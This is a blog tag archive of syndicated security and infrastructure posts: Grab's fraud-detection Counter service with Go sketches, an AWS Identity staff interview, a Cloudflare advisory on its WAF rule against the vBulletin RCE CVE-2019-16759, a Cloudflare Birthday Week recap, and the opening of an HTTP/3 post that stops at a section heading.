Tag Archives: security

Using Grab’s Trust Counter Service to Detect Fraud Successfully

Post Syndicated from Grab Tech original https://engineering.grab.com/using-grabs-trust-counter-service-to-detect-fraud-successfully

Background

Fraud is not a new phenomenon, but with the rise of the digital economy it has taken different and aggressive forms. Over the last decade, novel ways to exploit technology have appeared, and as a result, millions of people have been impacted and millions of dollars in revenue have been lost. According to an ACFE survey, companies lost USD 6.3 billion due to fraud, and organizations lose an estimated 5% of their revenue annually to fraud.

In this blog, we take a closer look at how we developed an anti-fraud solution using the Counter service, which can be an indispensable tool in the highly complex world of fraud detection.

Anti-fraud solution using counters

At Grab, we detect fraud by deploying data science, analytics, and engineering tools to search for anomalous and suspicious transactions, or to identify high-risk individuals who are likely to commit fraud. Grab’s Trust Platform team provides a common anti-fraud solution across a variety of business verticals, such as transportation, payment, food, and safety. The team builds tools for managing data feeds, creates SDK for engineering integration, and builds rules engines and consoles for fraud detection.

One example of fraudulent behavior is an individual who masquerades as both driver and passenger and makes cashless payments to get promotions, for example, to earn a one-dollar rebate on the next transaction. In our system, we analyze real-time booking and payment signals, compare them with the historical data of the driver and passenger pair, and create rules using the rule engine. We count the number of transactions for a given driver and passenger pair within a given time frame, and this counter is provided as an input to the rule. If the counter value exceeds a predefined threshold, the rule evaluates the transaction as fraudulent, and we send this verdict back to the booking service. A minimal sketch of this idea follows.
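The following Go sketch is hypothetical (Grab hasn’t published its rule-engine internals); it shows a sliding-window counter keyed by the driver-passenger pair feeding a simple threshold rule.

package main

import (
    "fmt"
    "time"
)

// event is a simplified booking/payment signal (hypothetical shape).
type event struct {
    DriverID    string
    PassengerID string
    At          time.Time
}

// pairCounter counts events per driver-passenger pair within a sliding window.
type pairCounter struct {
    window time.Duration
    seen   map[string][]time.Time
}

// add records an event and returns the pair's current count in the window.
func (c *pairCounter) add(e event) int {
    key := e.DriverID + ":" + e.PassengerID
    cutoff := e.At.Add(-c.window)
    kept := c.seen[key][:0] // in-place filter: drop timestamps outside the window
    for _, t := range c.seen[key] {
        if t.After(cutoff) {
            kept = append(kept, t)
        }
    }
    c.seen[key] = append(kept, e.At)
    return len(c.seen[key])
}

func main() {
    const threshold = 3 // hypothetical rule threshold
    counter := &pairCounter{window: 30 * time.Minute, seen: map[string][]time.Time{}}

    now := time.Now()
    for i := 0; i < 4; i++ {
        e := event{DriverID: "d1", PassengerID: "p1", At: now.Add(time.Duration(i) * time.Minute)}
        if n := counter.add(e); n > threshold {
            fmt.Printf("rule fired: pair %s:%s made %d cashless bookings in 30m\n",
                e.DriverID, e.PassengerID, n)
        }
    }
}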

The conventional method

Fraud detection is a job that requires cross-functional teams, such as data scientists, data analysts, data engineers, and backend engineers, to work together. Usually, data scientists or data analysts develop an idea offline, for example a rule invented after brainstorming sessions, and then want to apply it to real-time traffic. In the conventional method, the rule then needs to be communicated to engineers, who implement and deploy it manually.

Automated solution using the Counter service

To overcome the challenges of the conventional method, the Trust Platform team decided to build the Counter service, a self-service platform that provides management tools for users and a computing engine for integrating with backend services. The service provides interfaces, such as a UI-based rule editor and data feeds, so that analysts can experiment and create rules without involving engineers. The platform team also provides data contracts, APIs, and SDKs so that the business verticals can adopt the service quickly and easily.

The major engineering challenges faced in designing the Counter service

There are millions of transactions happening at Grab every day, which means we need to perform billions of fraud and safety detections. As the earlier example shows, most predictions require a group of counters. In that use case, we need to know how many cashless payments happened for each driver and passenger pair. Given the scale of Grab’s business, the number of potential driver and passenger combinations is enormous. And this is only one use case; there could be hundreds of counters for different use cases. Hence, it’s important that we provide a platform for stakeholders to manage counters.

Some of the common challenges we faced were:

Scalability

As mentioned above, a single counter could potentially cover an enormous number of passenger and driver combinations, so storing the counters in a database and reading and querying them in real time is a great challenge. With billions of counter keys spanning a long period of time, the Trust team had to find a scalable way to write and fetch keys effectively and still meet the client’s SLA.

Self-serving

A counter is usually invented by data scientists or analysts and used by engineers. For example, every time data scientists need a new type of counter, developers have to manually make code changes, such as adding a new stream, capturing the related data sets for the counter, and storing it on the fraud service, and then do a deployment to make the counter ready. The whole iteration usually takes two or more weeks, and if there are any changes from the data analysts’ side, which happens often, the loop starts again. The team had to prevent this long loop of manual tasks by building a self-service interface.

Manageable and extendable

Due to the lack of a connection between real-time and offline data, data analysts and data scientists did not have a clear picture of what was written in the counters. That’s because the conventional counter data were stored in a Redis database to satisfy the query SLA, so they could not track the correctness of a counter’s value or its history. With the new solution, stakeholders get a real-time picture of what is stored in the counters using data engineering tools.

The Machine Learning challenges solved by the Counter service

The Counter service plays an important role in our Machine Learning (ML) workflow.

Data Consistency Challenge/Issue

Most machine learning workflows need dedicated input data. However, when an anti-fraud model is trained on offline data from the data lake, it is difficult to use the same model in real time, because the model lacks a data contract and consistency with the data source. In this case, the Counter service becomes a data source in its own right by providing the values of counters to the file system.

ML featuring

Counters are important features for ML models. Imagine data scientists propose a new counter that needs to be evaluated: we must provide a historical data set for the counter to work. The Counter service provides a counter replay feature, which allows data scientists to simulate counters from historical payloads, as sketched below.
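As a minimal sketch of the replay idea (hypothetical names; the real mechanism is internal to Grab): the same processing function that handles live events is fed archived payloads, so the simulated counter values match what the production path would have computed.

package main

import "fmt"

// payload is a simplified historical event record (hypothetical shape).
type payload struct {
    Key string // e.g. "fraud:counter:counter_name"
    N   int    // increment carried by the event
}

// process applies one event to the counter state; the live path and the
// replay path share this function so their results stay consistent.
func process(state map[string]int, p payload) {
    state[p.Key] += p.N
}

// replay rebuilds counter values by running archived payloads through
// the same processor used for live traffic.
func replay(history []payload) map[string]int {
    state := make(map[string]int)
    for _, p := range history {
        process(state, p)
    }
    return state
}

func main() {
    history := []payload{
        {Key: "fraud:counter:pair_d1_p1", N: 1},
        {Key: "fraud:counter:pair_d1_p1", N: 1},
        {Key: "fraud:counter:pair_d2_p9", N: 1},
    }
    for k, v := range replay(history) {
        fmt.Println(k, "=", v)
    }
}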

In general, the Counter service is a bridge between online and offline datasets, and between data scientists and engineers. There was technical debt around data consistency and automation in the ML pipeline, and the Counter service closed this loop.

How we designed the Counter service

We followed the principle of asynchronous data ingestion and synchronous transactions when designing the Counter service.

The diagram below shows how the counters are generated and saved to the database.

How the counters are generated and saved to the database

Counter creation workflow

  1. A user opens the Counter Creation UI and creates a new key “fraud:counter:counter_name”.
  2. The user configures the required fields.
  3. The Counter service detects the new counter creation, puts the new counter into load script storage, and starts processing new counter events (see Counter write workflow below). A sketch of what such a counter definition might contain follows this list.
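The configuration schema hasn’t been published, so the following Go sketch is purely hypothetical: it shows the kind of fields a counter definition created through the UI might carry.

package counter

// CounterDefinition is a hypothetical sketch of what the Counter
// Creation UI might persist for each onboarded counter; all field
// names are assumptions, not Grab's actual schema.
type CounterDefinition struct {
    Key        string   // e.g. "fraud:counter:counter_name"
    Streams    []string // input streams to monitor, e.g. booking and payment
    Expression string   // user-configured expression evaluated per event
    GroupBy    []string // dimensions to count by, e.g. driver and passenger IDs
    WindowSecs int      // time window the counter aggregates over, in seconds
    Threshold  int64    // optional threshold consumed by downstream rules
}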

Counter write workflow

  1. The Counter service monitors multiple streams and assembles extra data from online data services (e.g. the Common Data Service (CDS), the passenger service, the hydra service, etc.), so that a rich dataset is also available to editors on each stream resource.
  2. The Counter Processor evaluates the user-configured expression and writes the evaluated values to the dedicated Grab-Stats stream using the GrabPlugin tool. A sketch of this evaluate-and-write step follows.
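As an illustration only (the expression language and the Grab-Stats/GrabPlugin interfaces are internal and not publicly documented), the processor’s evaluate-and-write step might look roughly like this:

package main

import "fmt"

// streamEvent is a simplified enriched event: the raw stream payload plus
// fields assembled from online data services (hypothetical shape).
type streamEvent struct {
    Fields map[string]string
}

// evaluate stands in for the user-configured expression; the real service
// parses the expression from the counter definition at runtime.
func evaluate(e streamEvent) (key string, ok bool) {
    if e.Fields["payment_type"] != "cashless" {
        return "", false
    }
    return "fraud:counter:pair_" + e.Fields["driver_id"] + "_" + e.Fields["passenger_id"], true
}

// writeToGrabStats stands in for the GrabPlugin write to the dedicated
// Grab-Stats stream.
func writeToGrabStats(key string, delta int) {
    fmt.Printf("grab-stats <- %s += %d\n", key, delta)
}

func main() {
    events := []streamEvent{
        {Fields: map[string]string{"payment_type": "cashless", "driver_id": "d1", "passenger_id": "p1"}},
        {Fields: map[string]string{"payment_type": "cash", "driver_id": "d2", "passenger_id": "p3"}},
    }
    for _, e := range events {
        if key, ok := evaluate(e); ok {
            writeToGrabStats(key, 1)
        }
    }
}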

Counter read workflow

We use Grab-Stats as our storage service. Grab-Stats runs on top of ScyllaDB, a distributed NoSQL data store. We chose ScyllaDB because of its good in-memory aggregation performance on time series datasets. Compared with in-memory storage like AWS ElastiCache, it is about 10 times cheaper and just as reliable in terms of stability. The p99 read latency from ScyllaDB is less than 150 ms, which satisfies our SLA.

How we improved the Counter service performance

We used the multi-buckets strategy to improve the Counter service performance.

Background

Queries come with different time windows. Some counters are time sensitive and need to know what happened in the last 30 or 60 minutes. Other counters focus on the long term and need to know the events of the last 30 or 90 days.

From a transactional database perspective, it’s not possible to serve short-range and long-term queries equally well at the same time: the higher the required accuracy and the longer the time range, the more aggregation has to happen in the database, which means we would not be able to satisfy the SLA, or we would have to block other processes and degrade the service.

Solution for improving the query

We resolved this problem by using tables of different granularities: we pre-aggregate the signals into different time buckets, such as 15 minutes, 1 hour, and 1 day.

When a request comes in, its time range is divided across these bucket granularities and the partial results are merged. For example, for a request from 9/10 23:15:20 to 9/12 17:20:18, the handler queries 15-minute buckets within the hour, hourly buckets for the rest of the same day, and daily buckets for the remaining two days. This way, we avoid doing heavy aggregations while keeping 15-minute accuracy at a scalable response time, as the sketch below illustrates.
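Here is a minimal Go sketch of the divide-and-merge idea, assuming request boundaries aligned to the finest (15-minute) bucket; it illustrates the strategy rather than Grab’s actual implementation.

package main

import (
    "fmt"
    "time"
)

// Granularities from coarsest to finest, mirroring the pre-aggregated
// bucket tables described above (1 day, 1 hour, 15 minutes).
var granularities = []time.Duration{24 * time.Hour, time.Hour, 15 * time.Minute}

type bucket struct {
    Start time.Time
    Size  time.Duration
}

// split divides [start, end) into pre-aggregated buckets, always picking
// the coarsest bucket that is aligned and fits inside the remaining range.
// Both endpoints are assumed to be aligned to 15 minutes (UTC); a real
// handler would merge the per-bucket values after querying each table.
func split(start, end time.Time) []bucket {
    var out []bucket
    for cur := start; cur.Before(end); {
        for _, g := range granularities {
            if cur.Equal(cur.Truncate(g)) && !cur.Add(g).After(end) {
                out = append(out, bucket{cur, g})
                cur = cur.Add(g)
                break
            }
        }
    }
    return out
}

func main() {
    start := time.Date(2019, 9, 10, 23, 15, 0, 0, time.UTC)
    end := time.Date(2019, 9, 12, 17, 15, 0, 0, time.UTC)
    for _, b := range split(start, end) {
        fmt.Println(b.Start.Format("01/02 15:04"), "for", b.Size)
    }
}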

Counter service UI

We allow data analysts and data scientists to onboard counters by themselves from a dedicated web portal. After a counter is submitted, the Counter service takes care of the integration and parses the logic at runtime.

Counter service UI

Backend integration

We provide an SDK for quicker and better integration. Engineers only need to provide the counter identifier ID (shown in the UI) and the time duration in the query. Under the hood we use gRPC to communicate across services. We divide the query time window into smaller granularities, fetch from the different time series tables, and then merge the results. We also provide a short-TTL cache layer to absorb uncommon client traffic such as network retries or traffic throttling. The service is designed to handle 100K QPS. A sketch of a query through the SDK follows.
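The SDK itself is internal, so the following Go sketch is purely a hypothetical illustration of the calling convention described above: the caller supplies a counter ID and a time window, and the service returns the merged value.

package counterclient

import (
    "context"
    "time"
)

// Client is a hypothetical stand-in for the Counter service SDK; under
// the hood it would issue a gRPC call, fan out to the time series
// tables by granularity, and merge the bucketed results.
type Client interface {
    // Query returns the aggregated counter value over the window
    // [now-window, now] for the counter ID shown in the UI.
    Query(ctx context.Context, counterID string, window time.Duration) (int64, error)
}

// Example usage: query a pair counter over the last 30 days.
func pairCount(ctx context.Context, c Client) (int64, error) {
    return c.Query(ctx, "fraud:counter:driver_passenger_pair", 30*24*time.Hour)
}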

Monitoring the Counter service

The Counter service dashboard helps track human errors made while editing counters in real time. The Counter service sends alerts to a Slack channel to notify users if there is any error.

Counter service dashboard

We set up Datadog to monitor multiple system metrics. The figure below shows a portion of the stream processing and counter writing. In this example, the total stream QPS reaches 5K at peak hour, and the rate of counters saved to the storage tier is about 4K. These numbers will keep climbing, without an upper limit, as more counters are onboarded.

Counter service dashboard with multiple metrics

The Counter service UI portal also helps users to fetch real-time counter results for verification purposes.

Counter service UI

Future plans

Here’s what we plan to do in the near future to improve the Counter service.

Close the ML workflow loop

As mentioned above, we plan to send the resource payload of the Counter service to the offline data lake in order to complete the counter replay function for data scientists. We are working on a project called “time traveler”. As the name indicates, it will not only serve online transactional data, but also support historical data analytics and provide more flexibility for counter inventions and experiments.

There are more automation steps we plan to take, such as adding a replay button on the web portal and hooking up the offline big data engine to trigger analytics jobs. Performance metrics will be collected and displayed on the web portal, and a single platform will be able to manage both the online and offline data.

Integration to Griffin

Griffin is our rule engine. Counters are sometimes an input to a particular rule, and one rule usually needs many counters working together. We need to provide better integration with Griffin on the backend, and we plan to minimize the engineering effort currently required to use counters in Griffin. A counter will then become an automated input variable in Griffin that any user can configure on the web portal.

AWS Security Profile: Ron Cully, Principal Product Manager, AWS Identity

Post Syndicated from Becca Crockett original https://aws.amazon.com/blogs/security/aws-security-profile-ron-cully-principal-product-manager-aws-identity/


In the weeks leading up to re:Invent, we’ll share conversations we’ve had with people at AWS who will be presenting at the event so you can learn more about them and some of the interesting work that they’re doing.


How long have you been at AWS, and what do you do in your current role?

I’ve been with AWS for nearly four years. I’m a Principal Product Manager in AWS Identity. I’ve spent most of my time covering our Managed Active Directory products, and over the past year I’ve taken on management of AWS Single Sign-On and AWS Identity and Access Management (IAM).

How do you explain your job to non-tech friends?

Identity is what people use when they sign in to their services. What we work on is the back-end systems that authenticate and manage access so that people have secure access to their services.

What are you currently working on that you’re excited about?

Wow, it’s hard to pick just one. So, I’d say I’m most excited about the work that we’re doing so that customers can use identities that they already have across all of AWS.

What’s the most challenging part of your job?

Making sure that we deliver the most important features that customers want, in the right sequence, as quickly as possible. To do that, we need to focus on the key pain points customers have right now and resolve those pain points in ways that are the most meaningful to them. We also need to make sure that we have the right roadmap and keep doing that on an iterative basis.

What’s your favorite part of your job?

I get to work with some really incredibly smart people inside and outside of Amazon. It’s a really interesting space to be in. There’s a lot happening at the industry level, and we’re trying to sort out the puzzle of how we bring things together given what customers have and use today. Customers have all of this existing technology that they want to use, and they have a lot of investments in it. We want to make it possible for them to use those investments in new innovative ways that make their lives easier.

The AWS Identity team is growing rapidly. What are some of the biggest challenges that teams face during rapid growth?

One key challenge is hiring. How do we find great people? Amazon has some pretty high bars, and we need to find the right people that can ramp up quickly to help us solve the challenges that we want to go fix. The other thing is making sure that we stay on the same page. There’s a lot of work that we’re doing across a lot of different areas. So it’s important to stay in coordination so that we deliver the most important things that solve our customers’ current pain points.

What advice would you give to people coming on board the AWS Identity team?

Make sure that you’re highly customer focused. Dive deep because we really need to understand the details of what’s going on and what customers are trying to accomplish. Be a really effective communicator by breaking things down into the simplest terms. I find that often, people get so caught up in technology that they get lost in the technology. It’s really important to remember that we’re solving problems that are very visceral to human beings. In order to get the correct results, you need to be able to communicate in a way that makes sense to anybody.

Which Amazon leadership principles have you relied on the most in your own career at AWS?

Certainly Customer Obsession. That’s absolutely imperative. Dive Deep of course. Learn and Be Curious is huge. But also a less popular principle: Have Backbone; Disagree and Commit. It’s important that we have healthy discussions. This principle isn’t about being confrontational. It’s about being smart about how you synthesize the information that you learn from your customers and bring forth your ideas and opinions in a respectful way. It’s important to have a healthy conversational debate about what’s right for customers, so that we can drive important things forward when they need to be done. At the same time, we must recognize that not all ideas or their timing are right. It’s important to understand the bigger picture of what’s going on, understand that a different approach might be better in that particular moment, and commit to moving forward as a team after the debate is finished.

What’s the most common misperception you encounter about AWS Identity?

I think there’s a huge amount of confusion in the Active Directory area about what you can and can’t do, and how it relates to what customers are doing with Azure AD. We probably have the best managed Active Directory in the cloud. But people sometimes confuse Active Directory with Azure AD, which are completely different technologies. So we try to help customers understand how our product works relative to Azure AD. They are complementary; they can work together.

Another area that’s confusing for customers is choosing which AWS identity system to use today. AWS identity systems have grown organically over time. We’ve listened to customers and added features, and so now we have a couple of different ways of approaching identity. We started out with IAM users and groups. Then over the past few years, we’ve made it possible to use Active Directory identities in AWS. We’ve also been embracing the use of standards-based federation. Federation enables customers who use identity systems like Okta, Ping, Google, or Azure AD to use those identities to sign in to AWS. Due to this organic growth, customers can choose between managing identities in IAM, creating them in AWS SSO, bringing them in from Active Directory by using AWS SSO, or using SAML federation through IAM. We also have the Cognito product that people have been adapting to use with IAM federation. Given the state of these technologies today, it can be confusing for customers to know which identity system to use right now so that they are on the right path going into the future. This is an area we are working hard to simplify and clarify for our customers.

What do you think is the biggest challenge facing the identity space right now?

I think it’s helping customers understand how to use the identity system that they have now—broadly, across all of the applications and services that they want to use—and how to provide them with a consistent experience. I think that’s one of the key industry challenges. We’ve come a long way, but there’s still a lot of road ahead of us to make that all possible at the industry level.

Looking to the future, how do you think the authorization and authentication landscape will evolve?

I think we’ll start to see more convergence on interoperable technologies for authentication. There’s some evolution already happening between the SAML model of authentication and OIDC (OpenID Connect), and I think we’ll see further convergence. One sticky spot in the industry right now is how to set up federation: it can be complicated and time consuming, and there’s work that we’re doing in this space to help make it easier. We did a technology demonstration at Identiverse last June using the FastFed standards draft to connect IdPs and service providers together. In our demonstration, we showed how FastFed makes it possible to connect AWS SSO to Google in a couple of clicks. That enables customers to use the identities they already have and use AWS SSO as their AWS integrated permissions management tool to grant access to resources across all their AWS accounts. I think FastFed will really help customers, because today it’s so complicated to try to connect identity providers to tens or hundreds of applications.

What does identity mean to you on a personal level?

When I think about identity, it’s about who I am, and there are different contexts for that, such as who I am as a consumer or who I am as an employee. Let’s focus on who I am as an employee: Today I may have different user identities and credentials, each to a different system. I also have to manage my passwords for each of those identities. If I make a mistake and use the wrong sign-in or password, I get blocked, and I might get locked out. These things get in the way of focusing on my job. Another example is that if I change my role within a company, I need access to new resources, and there are old resources that I should no longer be able to access. It’s really a pain today for people to navigate getting my access to resources set up correctly. It can take a month before you have all of the different permissions to access the things you need. So when I look at what I want to do for customers, it’s about “how do I make it really easy for people to get access to the things they need without compromising security?” I want to make it so that people can have one identity to use, and when there’s a change to their identity, the system automatically gives them access to what they need and removes access to what they don’t need. People shouldn’t have to go through all the painful processes of going to websites and talking to managers to get them to change group membership.

Will you be doing anything at re:Invent this year?

I’m involved in a few sessions.

I’ll be talking about our single sign-on product, AWS Single Sign-On. It enables customers to centrally manage access to the AWS Console, accounts, roles, and applications using identities from their Active Directory, or identities they create in AWS SSO. We’ll be talking about some exciting new features that we’ve released in that product area since the last re:Invent.

I’m also involved in a session about how enterprises can use Active Directory in the cloud. Customers have a lot of investment in their Windows environments on premises, and they’re migrating their workloads into the cloud. As they do that, those Windows workloads in the cloud need access to Active Directory. Customers often don’t want to manage the Active Directory infrastructure in the cloud. The operational pain of doing that detracts from what they’re trying to do, which is to get to the cloud and actually convert into server-less technologies where they get better economies of scale and more flexibility. AWS offers a managed Active Directory solution that customers can use with their Windows workloads while eliminating the overhead of operating Active Directory domain controllers in the cloud.

What are you hoping that your audience will do differently as a result of attending?

I would love to see customers realize they can take advantage of the services we offer in new ways, and then go home and deploy them. I would hope that they go back and do a proof of concept—go play with it and understand what it can do, see what kind of value it can bring, and then build out from there. Armed with the right information I think customers can streamline some processes in terms of how to get on to the cloud and take advantage of the cloud faster.

What do you recommend that first-time attendees do at re:Invent?

There’s so much amazing content that’s there, you won’t be able to get it all. So, get clear about what information you’re after, go through the session list, and get registered for the sessions. Sometimes these fill up fast! If you’re coming with a team, divide and conquer. But also leave some time to learn something new in an area you’re less familiar with. Also, take advantage of the presenters. Ask us questions! We’re here to help customers learn as much as they can. If you see me there, stop me and ask your questions!

If you had to pick any other job, what would you want to do with your life?

I would probably want to be in food safety. I used to not care about food at all. Then, I went to an event where I made a life decision that made me think about my health and made me think about my food. So I started understanding more about food. I began realizing how much happens with our food today that we just don’t know about. There are a lot of things that I really don’t align with. I would love to see more transparency about our food so that we could have the ability to pick and choose what we want to eat based upon our values. If it wasn’t food safety, maybe politics.

Want more AWS Security news? Follow us on Twitter.

The AWS Security team is hiring! Want to find out more? Check out our career page.

Ron Cully

Ron Cully is a Principal Product Manager at AWS where he leads feature and roadmap planning for workforce identity products at AWS. Ron has over 20 years of industry experience in product and program management of networking and directory related products. He is passionate about delivering secure, reliable solutions that help make it easier for customers to migrate directory aware applications and workloads to the cloud.

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Post Syndicated from Alex Cruz Farmer original https://blog.cloudflare.com/cloudflares-protection-against-a-new-remote-code-execution-vulnerability-cve-2019-16759-in-vbulletin/

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Cloudflare has released a new rule as part of its Cloudflare Specials Rulesets to protect our customers against a high-severity vulnerability in vBulletin.

A new zero-day vulnerability was discovered for vBulletin, a proprietary Internet forum software. By exploiting this vulnerability, bad actors could potentially gain privileged access and control to the host servers on which this software runs, through Remote Code Execution (RCE).

Implications of this vulnerability

At Cloudflare, we use three key indicators to understand the severity of a vulnerability: 1) how many customers on Cloudflare are running the affected software; 2) the Common Vulnerability Scoring System (CVSS) score; and 3) the OWASP Top 10, an open-source security framework.

We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10.

Remote Code Execution is considered a type of injection, which provides the capability to launch a potentially catastrophic attack. Through RCE, an attacker can gain privileged access to a host server running an unpatched and vulnerable version of the software. With elevated privileges, the attacker could perform malicious activities, including discovering additional vulnerabilities in the system, checking for misconfigured file permissions on configuration files, and even deleting logs to wipe out any audit trail of their activities.

We have also often observed attackers exploiting RCE vulnerabilities to deploy malware on the host, make it part of a DDoS botnet, or exfiltrate valuable data stored in the system.

Cloudflare’s continuously learning Firewall has you covered

At Cloudflare, we continuously strive to improve the security posture of our customers by quickly and seamlessly mitigating vulnerabilities of this nature. Protection against common RCE attacks is a standard feature of Cloudflare’s Managed Rulesets. To provide coverage for this specific vulnerability, we have deployed a new rule within our Cloudflare Specials Rulesets (ruleId: 100166). Customers who have our Managed Rulesets and Cloudflare Specials enabled will be immediately protected against this vulnerability.

To check whether you have this protection enabled, please log in, navigate to the Firewall tab, and under the Managed Rulesets tab you will find the toggle to enable the WAF Managed Rulesets. See below:

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin

Next, confirm that you have the Cloudflare Specials Rulesets enabled, by checking in the Managed Rulesets card as shown below:

Cloudflare’s protection against a new Remote Code Execution vulnerability (CVE-2019-16759) in vBulletin
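If you prefer to verify this programmatically, the zone-level WAF switch is also exposed through the Cloudflare v4 API as the waf zone setting. Here is a rough Go sketch under that assumption; the zone ID and API token are placeholders, and this checks only the top-level WAF toggle, not the Cloudflare Specials ruleset specifically.

package main

import (
    "fmt"
    "io/ioutil"
    "net/http"
)

func main() {
    // Placeholders: substitute your own zone ID and API token.
    const zoneID = "YOUR_ZONE_ID"
    req, err := http.NewRequest("GET",
        "https://api.cloudflare.com/client/v4/zones/"+zoneID+"/settings/waf", nil)
    if err != nil {
        panic(err)
    }
    req.Header.Set("Authorization", "Bearer YOUR_API_TOKEN")

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()

    // The JSON response's result.value field is "on" when the WAF is enabled.
    body, _ := ioutil.ReadAll(resp.Body)
    fmt.Println(string(body))
}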

Our customers who use our free services, or those who don’t have Cloudflare’s Managed Rulesets turned on, can also protect themselves by deploying a patch on their own. The vBulletin team has released a security patch, the details of which can be found here.

Cloudflare’s Firewall is built on and continuously learns from our vast network spanning over 190 cities. In Q2 2019, Cloudflare blocked an average of 44 billion cyber threats each day. Learn more about our simple, easy to use, and powerful Cloudflare Firewall and protect your business today.

Birthday Week 2019 Wrap-up

Post Syndicated from Jake Anderson original https://blog.cloudflare.com/birthday-week-2019-wrap-up/

Birthday Week 2019 Wrap-up

This week we celebrated Cloudflare’s 9th birthday by launching a variety of new offerings that support our mission: to help build a better Internet.  Below is a summary recap of how we celebrated Birthday Week 2019.

Cleaning up bad bots

Every day Cloudflare protects over 20 million Internet properties from malicious bots, and this week you were invited to join in the fight!  Now you can enable “bot fight mode” in the Firewall settings of the Cloudflare Dashboard and we’ll start deploying CPU intensive code to traffic originating from malicious bots.  This wastes the bots’ CPU resources and makes it more difficult and costly for perpetrators to deploy malicious bots at scale. We’ll also share the IP addresses of malicious bot traffic with our Bandwidth Alliance partners, who can help kick malicious bots offline. Join us in the battle against bad bots – and, as you can read here – you can help the climate too!

Browser Insights

Speed matters, and if you manage a website or app, you want to make sure that you’re delivering a high performing website to all of your global end users. Now you can enable Browser Insights in the Speed section of the Cloudflare Dashboard to analyze website performance from the perspective of your users’ web browsers.  

WARP, the wait is over

Several months ago we announced WARP, a free mobile app purpose-built to address the security and performance challenges of the mobile Internet, while also respecting user privacy. After months of testing and development, this week we (finally) rolled out WARP to approximately 2 million wait-list customers. We also enabled WARP Plus (WARP+), a premium WARP experience that uses Argo routing technology to route your mobile traffic across faster, less-congested routes through the Internet. WARP and WARP Plus are now available in the iOS and Android app stores and we can’t wait for you to give them a try!

HTTP/3 Support

Last year we announced early support for QUIC, a UDP based protocol that aims to make everything on the Internet work faster, with built-in encryption. The IETF subsequently decided that QUIC should be the foundation of the next generation of the HTTP protocol, HTTP/3. This week, Cloudflare was the first to introduce support for HTTP/3 in partnership with Google Chrome and Mozilla.

Workers Sites

Finally, to wrap up our birthday week announcements, we announced Workers Sites. The Workers serverless platform continues to grow and evolve, and every day we discover new and innovative ways to help developers build and optimize their applications. Workers Sites enables developers to easily deploy lightweight static sites across Cloudflare’s global cloud platform without having to build out the traditional backend server infrastructure to support these sites.

We look forward to Birthday Week every year, as a chance to showcase some of our exciting new offerings — but we all know building a better Internet is about more than one week.  It’s an effort that takes place all year long, and requires the help of our partners, employees and especially you — our customers. Thank you for being a customer, providing valuable feedback and helping us stay focused on our mission to help build a better Internet.

Can’t get enough of this week’s announcements, or want to learn more? Register for next week’s Birthday Week Recap webinar to get the inside scoop on every announcement.

HTTP/3: the past, the present, and the future

Post Syndicated from Alessandro Ghedini original https://blog.cloudflare.com/http3-the-past-present-and-future/

HTTP/3: the past, the present, and the future

During last year’s Birthday Week we announced preliminary support for QUIC and HTTP/3 (or “HTTP over QUIC” as it was known back then), the new standard for the web, enabling faster, more reliable, and more secure connections to web endpoints like websites and APIs. We also let our customers join a waiting list to try QUIC and HTTP/3 as soon as they became available.

Since then, we’ve been working with industry peers through the Internet Engineering Task Force, including Google Chrome and Mozilla Firefox, to iterate on the HTTP/3 and QUIC standards documents. In parallel with the standards maturing, we’ve also worked on improving support on our network.

We are now happy to announce that QUIC and HTTP/3 support is available on the Cloudflare edge network. We’re excited to be joined in this announcement by Google Chrome and Mozilla Firefox, two of the leading browser vendors and partners in our effort to make the web faster and more reliable for all.

In the words of Ryan Hamilton, Staff Software Engineer at Google, “HTTP/3 should make the web better for everyone. The Chrome and Cloudflare teams have worked together closely to bring HTTP/3 and QUIC from nascent standards to widely adopted technologies for improving the web. Strong partnership between industry leaders is what makes Internet standards innovations possible, and we look forward to our continued work together.”

What does this mean for you, a Cloudflare customer who uses our services and edge network to make your web presence faster and more secure? Once HTTP/3 support is enabled for your domain in the Cloudflare dashboard, your customers can interact with your websites and APIs using HTTP/3. We’ve been steadily inviting customers on our HTTP/3 waiting list to turn on the feature (so keep an eye out for an email from us), and in the coming weeks we’ll make the feature available to everyone.

What does this announcement mean if you’re a user of the Internet interacting with sites and APIs through a browser and other clients? Starting today, you can use Chrome Canary to interact with Cloudflare and other servers over HTTP/3. For those of you looking for a command line client, curl also provides support for HTTP/3. Instructions for using Chrome and curl with HTTP/3 follow later in this post.

The Chicken and the Egg

Standards innovation on the Internet has historically been difficult because of a chicken and egg problem: which needs to come first, server support (like Cloudflare, or other large sources of response data) or client support (like browsers, operating systems, etc)? Both sides of a connection need to support a new communications protocol for it to be any use at all.

Cloudflare has a long history of driving web standards forward, from HTTP/2 (the version of HTTP preceding HTTP/3), to TLS 1.3, to things like encrypted SNI. We’ve pushed standards forward by partnering with like-minded organizations who share in our desire to help build a better Internet. Our efforts to move HTTP/3 into the mainstream are no different.

Throughout the HTTP/3 standards development process, we’ve been working closely with industry partners to build and validate client HTTP/3 support compatible with our edge support. We’re thrilled to be joined by Google Chrome and curl, both of which can be used today to make requests to the Cloudflare edge over HTTP/3. Mozilla Firefox expects to ship support in a nightly release soon as well.

Bringing this all together: today is a good day for Internet users; widespread rollout of HTTP/3 will mean a faster web experience for all, and today’s support is a large step toward that.

More importantly, today is a good day for the Internet: Chrome, curl, and Cloudflare, and soon, Mozilla, rolling out experimental but functional, support for HTTP/3 in quick succession shows that the Internet standards creation process works. Coordinated by the Internet Engineering Task Force, industry partners, competitors, and other key stakeholders can come together to craft standards that benefit the entire Internet, not just the behemoths.

Eric Rescorla, CTO of Firefox, summed it up nicely: “Developing a new network protocol is hard, and getting it right requires everyone to work together. Over the past few years, we’ve been working with Cloudflare and other industry partners to test TLS 1.3 and now HTTP/3 and QUIC. Cloudflare’s early server-side support for these protocols has helped us work the interoperability kinks out of our client-side Firefox implementation. We look forward to advancing the security and performance of the Internet together.”

How did we get here?

Before we dive deeper into HTTP/3, let’s have a quick look at the evolution of HTTP over the years in order to better understand why HTTP/3 is needed.

